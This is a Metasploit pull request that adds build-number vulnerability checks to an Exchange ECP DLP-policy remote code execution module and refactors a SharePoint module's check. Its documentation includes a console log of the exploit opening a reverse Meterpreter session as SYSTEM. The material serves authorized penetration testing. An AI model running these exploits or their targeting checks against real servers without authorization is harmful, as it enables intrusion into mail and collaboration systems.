### PR TITLE
Add version check to exploit/windows/http/exchange_ecp_dlp_policy

### DIFF
--- a/documentation/modules/exploit/windows/http/exchange_ecp_dlp_policy.md
+++ b/documentation/modules/exploit/windows/http/exchange_ecp_dlp_policy.md
@@ -20,7 +20,7 @@ user-supplied template data when creating a DLP policy. An attacker
 can leverage this vulnerability to execute code in the context of
 `SYSTEM`.
 
-Tested against Exchange Server 2016 CU14 on Windows Server 2016.
+Tested against Exchange Server 2016 CU17 on Windows Server 2016.
 
 ### Setup
 
@@ -34,7 +34,7 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ### 0
 
-`Exchange Server 2016 and 2019 w/o KB4577352`
+`Exchange Server <= 2016 CU17 and 2019 CU6`
 
 ## Options
 
@@ -48,7 +48,7 @@ Set this to the OWA password.
 
 ## Scenarios
 
-### Exchange Server 2016 CU14 on Windows Server 2016
+### Exchange Server 2016 CU17 on Windows Server 2016
 
 ```
 msf6 > use exploit/windows/http/exchange_ecp_dlp_policy
@@ -83,11 +83,11 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Exchange Server 2016 and 2019 w/o KB4577352
+   0   Exchange Server <= 2016 CU17 and 2019 CU6
 
 
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set rhosts 192.168.123.192
-rhosts => 192.168.123.192
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set rhosts 192.168.123.178
+rhosts => 192.168.123.178
 msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set username Administrator
 username => Administrator
 msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set password Passw0rd!
@@ -98,21 +98,21 @@ msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
 
 [*] Started HTTPS reverse handler on https://192.168.123.1:8443
 [*] Executing automatic check (disable AutoCheck to override)
-[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
+[+] The target appears to be vulnerable. Exchange Server 15.1.2044 is a vulnerable build.
 [*] Logging in to OWA with creds Administrator:Passw0rd!
 [+] Successfully logged in to OWA
 [*] Retrieving ViewState from DLP policy creation page
 [+] Successfully retrieved ViewState
 [*] Creating custom DLP policy from malicious template
-[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
-[*] Powershell command length: 2372
-[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
-[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500
+[*] DLP policy name: Abn Amro Corporate Finance Limited Data
+[*] Powershell command length: 2472
+[*] https://192.168.123.1:8443 handling request from 192.168.123.178; (UUID: jk8kdh8r) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.178:28314) at 2020-10-20 14:30:05 -0500
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
-Computer        : WIN-365Q2VJJS17
+Computer        : WIN-G2PGASM3QFA
 OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US

--- a/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
+++ b/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           can leverage this vulnerability to execute code in the context of
           SYSTEM.
 
-          Tested against Exchange Server 2016 CU14 on Windows Server 2016.
+          Tested against Exchange Server 2016 CU17 on Windows Server 2016.
         },
         'Author' => [
           'mr_me', # Discovery, exploits, and most of the words above
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
-          ['Exchange Server 2016 and 2019 w/o KB4577352', {}]
+          ['Exchange Server <= 2016 CU17 and 2019 CU6', {}]
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -97,6 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
+  def vuln_builds
+    # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019
+    [
+      [Gem::Version.new('15.1.225'), Gem::Version.new('15.1.2044')], # Exchange Server 2016
+      [Gem::Version.new('15.2.196'), Gem::Version.new('15.2.659')] # Exchange Server 2019
+    ]
+  end
+
   def check
     res = send_request_cgi(
       'method' => 'GET',
@@ -107,11 +115,18 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target did not respond to check.')
     end
 
-    unless res.code == 200 && res.body.include?('<title>Outlook</title>')
-      return CheckCode::Unknown('Target does not appear to be running OWA.')
+    # Hat tip @tsellers-r7
+    #
+    # <link rel="shortcut icon" href="/owa/auth/15.1.2044/themes/resources/favicon.ico" type="image/x-icon">
+    unless res.code == 200 && %r{/owa/auth/(?<build>[\d.]+)/} =~ res.body
+      return CheckCode::Unknown('Target does not appear to be running Exchange Server.')
     end
 
-    CheckCode::Detected("OWA is running at #{full_uri('/owa/')}")
+    if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }
+      return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
+    end
+
+    CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
   end
 
   def exploit

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -109,6 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vuln_builds
+    # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
+    # https://buildnumbers.wordpress.com/sharepoint/
     [
       [Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013
       [Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016
@@ -129,12 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Hat tip @tsellers-r7
     #
     # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
-    unless (build_header = res.headers['MicrosoftSharePointTeamServices'])
+    unless /^(?<build>[\d.]+):/ =~ res.headers['MicrosoftSharePointTeamServices']
       return CheckCode::Unknown('Target does not appear to be running SharePoint.')
-    end
-
-    unless (build = build_header.scan(/^([\d.]+):/).flatten.first)
-      return CheckCode::Detected('Target did not respond with SharePoint build.')
     end
 
     if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }


### PR DESCRIPTION
```
[+] The target appears to be vulnerable. Exchange Server 15.1.2044 is a vulnerable build.
```

[owa_login](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/owa_login.rb) could use some love, too. But someone else can do that.

Updates #14126 and #14265.